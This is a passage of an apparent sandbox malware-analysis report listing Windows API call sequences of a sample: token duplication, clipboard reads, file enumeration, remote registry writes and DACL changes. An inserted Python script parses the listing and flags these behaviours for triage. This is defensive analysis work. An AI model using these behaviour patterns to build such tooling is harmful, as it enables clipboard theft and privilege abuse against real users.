                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$F
                                                                                        • API String ID: 3977979337-4164748364
                                                                                        • Opcode ID: a171fe550a5cc447abd9aa396c42cd24e4d23460c976d7be9a5ece5ce0be1e91
                                                                                        • Instruction ID: b086269a05fb4fb0cdc25ec45e64cfaf526942c61702c2b35733a94dd3efbf44
                                                                                        • Opcode Fuzzy Hash: a171fe550a5cc447abd9aa396c42cd24e4d23460c976d7be9a5ece5ce0be1e91
                                                                                        • Instruction Fuzzy Hash: 4042CF302083519FD724DF28D894B6ABBE5FF89310F140699F659972E0CB71EC64CB92
                                                                                        APIs
                                                                                          • Part of subcall function 00AF9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF93E3
                                                                                          • Part of subcall function 00AF9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF9410
                                                                                          • Part of subcall function 00AF9399: GetLastError.KERNEL32 ref: 00AF941D
                                                                                        • _memset.LIBCMT ref: 00AF8F71
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AF8FC3
                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF8FD4
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AF8FEB
                                                                                        • GetProcessWindowStation.USER32 ref: 00AF9004
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00AF900E
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AF9028
                                                                                          • Part of subcall function 00AF8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8F27), ref: 00AF8DFE
                                                                                          • Part of subcall function 00AF8DE9: CloseHandle.KERNEL32(?,?,00AF8F27), ref: 00AF8E10
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $default$winsta0
                                                                                        • API String ID: 2063423040-1027155976
                                                                                        • Opcode ID: 678a0f8afd26710647ad45220415b012239f00e42510693264691fd4782447b8
                                                                                        • Instruction ID: 91d14ba3923b924a4aa4d6f0927f8bcd3355b1f129c7b566b7508860cd666365
                                                                                        • Opcode Fuzzy Hash: 678a0f8afd26710647ad45220415b012239f00e42510693264691fd4782447b8
                                                                                        • Instruction Fuzzy Hash: 118137B190020DBFDF11AFA4DE49AFFBB79AF04304F144269FA14A7261DB318E159B64
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(00B30980), ref: 00B1465C
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B1466A
                                                                                        • GetClipboardData.USER32(0000000D), ref: 00B14672
                                                                                        • CloseClipboard.USER32 ref: 00B1467E
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B1469A
                                                                                        • CloseClipboard.USER32 ref: 00B146A4
                                                                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00B146B9
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00B146C6
                                                                                        • GetClipboardData.USER32(00000001), ref: 00B146CE
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B146DB
                                                                                        • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00B1470F
                                                                                        • CloseClipboard.USER32 ref: 00B1481F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                        • String ID:
                                                                                        • API String ID: 3222323430-0
                                                                                        • Opcode ID: fe158cd8952743bea2505cf2901c1bb5efe35c254e4b1c507018ffb110246b8c
                                                                                        • Instruction ID: d7cbc5c3359e79c5e5eea99137edffc3b61429b2176b76d763ba71fa297a30d3
                                                                                        • Opcode Fuzzy Hash: fe158cd8952743bea2505cf2901c1bb5efe35c254e4b1c507018ffb110246b8c
                                                                                        • Instruction Fuzzy Hash: 00519B31204201AFD300FB64EDAAFAE77A8AF95B11F500569F646931E2DF7099448B62
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B0CDD0
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0CE24
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0CE49
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0CE60
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B0CE87
                                                                                        • __swprintf.LIBCMT ref: 00B0CED3
                                                                                        • __swprintf.LIBCMT ref: 00B0CF16
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • __swprintf.LIBCMT ref: 00B0CF6A
                                                                                          • Part of subcall function 00AC38C8: __woutput_l.LIBCMT ref: 00AC3921
                                                                                        • __swprintf.LIBCMT ref: 00B0CFB8
                                                                                          • Part of subcall function 00AC38C8: __flsbuf.LIBCMT ref: 00AC3943
                                                                                          • Part of subcall function 00AC38C8: __flsbuf.LIBCMT ref: 00AC395B
                                                                                        • __swprintf.LIBCMT ref: 00B0D007
                                                                                        • __swprintf.LIBCMT ref: 00B0D056
                                                                                        • __swprintf.LIBCMT ref: 00B0D0A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 3953360268-2428617273
                                                                                        • Opcode ID: 705b8ce51c0fe4cd1e7498a228f2573309a5d0703e327ca6b824a43d4e6eb203
                                                                                        • Instruction ID: 51b4627de945b88cfab4ff3c42e269e87e637f6abb4d16bfc55b1a54678e9b57
                                                                                        • Opcode Fuzzy Hash: 705b8ce51c0fe4cd1e7498a228f2573309a5d0703e327ca6b824a43d4e6eb203
                                                                                        • Instruction Fuzzy Hash: BBA120B2404305ABC710EFA4DA95DAFB7ECEF99704F40491DF58587192EB70EA09CB62
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B0F5F9
                                                                                        • _wcscmp.LIBCMT ref: 00B0F60E
                                                                                        • _wcscmp.LIBCMT ref: 00B0F625
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00B0F637
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00B0F651
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B0F669
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F674
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F690
                                                                                        • _wcscmp.LIBCMT ref: 00B0F6B7
                                                                                        • _wcscmp.LIBCMT ref: 00B0F6CE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F6E0
                                                                                        • SetCurrentDirectoryW.KERNEL32(00B5B578), ref: 00B0F6FE
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F708
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F715
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F727
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        • Opcode ID: 850923526fa91e8be6048988c3dbb0aea6c1dd4644a658b6edf43b5bb474db97
                                                                                        • Instruction ID: a1ac70594e972e7dd7fdeeb4961e6716563600701d338a8588f7ec0f594993ea
                                                                                        • Opcode Fuzzy Hash: 850923526fa91e8be6048988c3dbb0aea6c1dd4644a658b6edf43b5bb474db97
                                                                                        • Instruction Fuzzy Hash: 3C31647164121AABDB24EEA4AC59AEE77ECEF09321F1041E5E804D31E0DB70DE44CA60
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20FB3
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B30980,00000000,?,00000000,?,?), ref: 00B21021
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B21069
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B210F2
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B21412
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B2141F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        • Opcode ID: 4965043d87e18ae20d0a6b4bfba29267991b6d8970d55003a97e0f6c228e3dbe
                                                                                        • Instruction ID: c4a52c1224d3ebf0d6af22dde877dad65d8dd7a521801bfe62f37c2b819e28b2
                                                                                        • Opcode Fuzzy Hash: 4965043d87e18ae20d0a6b4bfba29267991b6d8970d55003a97e0f6c228e3dbe
                                                                                        • Instruction Fuzzy Hash: C3027C752006119FCB14EF28D991E2AB7E5FF89714F04899DF9999B3A2CB70EC01CB91
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B0F756
                                                                                        • _wcscmp.LIBCMT ref: 00B0F76B
                                                                                        • _wcscmp.LIBCMT ref: 00B0F782
                                                                                          • Part of subcall function 00B04875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B04890
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B0F7B1
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F7BC
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F7D8
                                                                                        • _wcscmp.LIBCMT ref: 00B0F7FF
                                                                                        • _wcscmp.LIBCMT ref: 00B0F816
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F828
                                                                                        • SetCurrentDirectoryW.KERNEL32(00B5B578), ref: 00B0F846
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F850
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F85D
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F86F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1824444939-438819550
                                                                                        • Opcode ID: 51f1f07dd2bf2dc8de95d8a9985da6ad32e1647d4c5faa6e52f0071453397744
                                                                                        • Instruction ID: 9a0e992cfc0b24f0177bded1a524dd64d365ecc70b1e0617350a154d6860a22b
                                                                                        • Opcode Fuzzy Hash: 51f1f07dd2bf2dc8de95d8a9985da6ad32e1647d4c5faa6e52f0071453397744
                                                                                        • Instruction Fuzzy Hash: 1A31867260031AABDB24AAB49C58AFE7BECDF49321F1441E5E814A35E0DB70DE458A50
                                                                                        APIs
                                                                                          • Part of subcall function 00AF8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8E3C
                                                                                          • Part of subcall function 00AF8E20: GetLastError.KERNEL32(?,00AF8900,?,?,?), ref: 00AF8E46
                                                                                          • Part of subcall function 00AF8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AF8900,?,?,?), ref: 00AF8E55
                                                                                          • Part of subcall function 00AF8E20: HeapAlloc.KERNEL32(00000000,?,00AF8900,?,?,?), ref: 00AF8E5C
                                                                                          • Part of subcall function 00AF8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF8E73
                                                                                          • Part of subcall function 00AF8EBD: GetProcessHeap.KERNEL32(00000008,00AF8916,00000000,00000000,?,00AF8916,?), ref: 00AF8EC9
                                                                                          • Part of subcall function 00AF8EBD: HeapAlloc.KERNEL32(00000000,?,00AF8916,?), ref: 00AF8ED0
                                                                                          • Part of subcall function 00AF8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AF8916,?), ref: 00AF8EE1
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AF8931
                                                                                        • _memset.LIBCMT ref: 00AF8946
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AF8965
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00AF8976
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00AF89B3
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AF89CF
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00AF89EC
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AF89FB
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00AF8A02
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AF8A23
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00AF8A2A
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AF8A5B
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AF8A81
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AF8A95
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: a9dd33ee31f23583f1324a0ab03aafeb2a20541ea7ed0a33ef61cc3eafec66aa
                                                                                        • Instruction ID: 0a7ac1fc30d7a86cee2144b2f47b939295ccde5e169c744a28a28d2e7e3554d3
                                                                                        • Opcode Fuzzy Hash: a9dd33ee31f23583f1324a0ab03aafeb2a20541ea7ed0a33ef61cc3eafec66aa
                                                                                        • Instruction Fuzzy Hash: 7D61347590020DEFDF05AFA1DC95ABEBB79FF04304F14812AFA15A7290DB399A04CB60
                                                                                        APIs
                                                                                          • Part of subcall function 00B2147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2040D,?,?), ref: 00B21491
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20B0C
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B20BAB
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B20C43
                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B20E82
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B20E8F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1240663315-0
                                                                                        • Opcode ID: df09e00ce4063693a0995d10aa7850ff2603122392999b291c0e223ee8828d47
                                                                                        • Instruction ID: 528e920b0fbb151e174f6d157fdbc545053879a80c847315e99f8b89c041156c
                                                                                        • Opcode Fuzzy Hash: df09e00ce4063693a0995d10aa7850ff2603122392999b291c0e223ee8828d47
                                                                                        • Instruction Fuzzy Hash: 01E15E71614214AFC714EF24D995E6EBBE8EF89714F0489ADF449DB2A2DB30EC01CB51
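The per-function "APIs" records above (the clipboard read with GetClipboardData(1), the FindFirstFileW("*.*") / SetCurrentDirectoryW walk, the RegConnectRegistryW / RegCreateKeyExW / RegSetValueExW write, and the GetUserObjectSecurity / AddAce / SetUserObjectSecurity DACL rewrite) are easier to triage when the listing is parsed into call sequences and matched against a few behaviour rules. The script below is an added example written for this page, not Joe Sandbox code and not part of the sample; it assumes the "• Api.MODULE(args), ref: ADDR" line format shown in the report, the sample lines are constructed from the records above, and the rule names and constant decodings (CF_TEXT = 1, REG_EXPAND_SZ = 2, DACL_SECURITY_INFORMATION = 0x4) are the editor's own choices. Argument values in a static listing are best-effort, so the decoded constants are flagged as hints rather than trusted.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a few "APIs" records copied in the report's own line format.
SAMPLE_TRACE = """\
APIs
• IsClipboardFormatAvailable.USER32(00000001), ref: 00B146C6
• GetClipboardData.USER32(00000001), ref: 00B146CE
• GlobalLock.KERNEL32(00000000), ref: 00B146DB
• CloseClipboard.USER32 ref: 00B1481F
APIs
• FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F690
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F6E0
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F708
• FindClose.KERNEL32(00000000), ref: 00B0F715
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20FB3
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00B30980,00000000,?,00000000,?,?), ref: 00B21021
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B210F2
APIs
  • Part of subcall function 00AF8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8E3C
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AF8931
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AF89CF
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AF8A95
"""

# One call line: optional "Part of subcall function X:" prefix, Api.MODULE, optional (args), "ref: ADDR".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

CLIPBOARD_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}           # wingdi/winuser constants
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}
DACL_SECURITY_INFORMATION = 0x4


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall: bool


@dataclass
class Func:
    calls: list = field(default_factory=list)

    @property
    def first_ref(self):
        direct = [c.ref for c in self.calls if not c.subcall]
        return direct[0] if direct else self.calls[0].ref

    def apis(self):
        return {c.api for c in self.calls}

    def find(self, api):
        return [c for c in self.calls if c.api == api]


def hexarg(s):
    """Decode a listed argument; '?' and strings such as '*.*' yield None."""
    try:
        return int(s, 16)
    except ValueError:
        return None


def parse_trace(text):
    funcs, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":            # each record starts a new function
            cur = Func()
            funcs.append(cur)
            continue
        m = CALL_RE.match(line)
        if m and cur is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["api"], m["mod"], args, m["ref"].upper(), m["sub"] is not None))
    return [f for f in funcs if f.calls]


# Behaviour rules: each returns a finding string or None. Decoded constants are hints only,
# because static listings recover argument values on a best-effort basis.
def rule_clipboard(f):
    if not {"IsClipboardFormatAvailable", "GetClipboardData"} <= f.apis():
        return None
    fmts = {hexarg(c.args[0]) for c in f.find("GetClipboardData") if c.args} - {None}
    return "clipboard read (" + ", ".join(sorted(CLIPBOARD_FORMATS.get(x, f"format {x}") for x in fmts)) + ")"


def rule_dir_walk(f):
    if not {"FindFirstFileW", "FindNextFileW", "SetCurrentDirectoryW"} <= f.apis():
        return None
    wildcard = any(c.args and c.args[0] == "*.*" for c in f.find("FindFirstFileW"))
    return "recursive directory walk" + (" with *.* wildcard" if wildcard else "")


def rule_registry_write(f):
    if not {"RegCreateKeyExW", "RegSetValueExW"} <= f.apis():
        return None
    types = {REG_TYPES.get(t, f"type {t}") for c in f.find("RegSetValueExW")
             if len(c.args) > 3 for t in [hexarg(c.args[3])] if t is not None}
    desc = "registry key create + value write" + (" (" + ", ".join(sorted(types)) + ")" if types else "")
    return desc + (", via RegConnectRegistryW" if "RegConnectRegistryW" in f.apis() else "")


def rule_user_object_dacl(f):
    # GetUserObjectSecurity/SetUserObjectSecurity act on window stations and desktops.
    if not {"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"} <= f.apis():
        return None
    dacl = any(len(c.args) > 1 and hexarg(c.args[1]) == DACL_SECURITY_INFORMATION
               for c in f.find("SetUserObjectSecurity"))
    return "window station/desktop DACL rewrite" + (" (DACL_SECURITY_INFORMATION)" if dacl else "")


RULES = [rule_clipboard, rule_dir_walk, rule_registry_write, rule_user_object_dacl]


def analyze(text):
    """Return one {ref, apis, findings} entry per parsed function."""
    return [{"ref": f.first_ref, "apis": len(f.calls),
             "findings": [r for r in (rule(f) for rule in RULES) if r]}
            for f in parse_trace(text)]


if __name__ == "__main__":
    for entry in analyze(SAMPLE_TRACE):
        print(entry["ref"], entry["apis"], "; ".join(entry["findings"]) or "-")
```

The rules are deliberately conservative: a function is flagged only when the full API set for a behaviour is present, and sub-call lines count toward that set because the report lists them as part of the function's reachable calls. Extend RULES with the other record shapes on this page (the FindResourceW(RT_GROUP_ICON = 0xE) / CreateIconFromResourceEx loader, for instance) by adding one function per behaviour.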
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 00B04451
                                                                                        • __swprintf.LIBCMT ref: 00B0445E
                                                                                          • Part of subcall function 00AC38C8: __woutput_l.LIBCMT ref: 00AC3921
                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00B04488
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00B04494
                                                                                        • LockResource.KERNEL32(00000000), ref: 00B044A1
                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00B044C1
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00B044D3
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00B044E2
                                                                                        • LockResource.KERNEL32(?), ref: 00B044EE
                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B0454F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
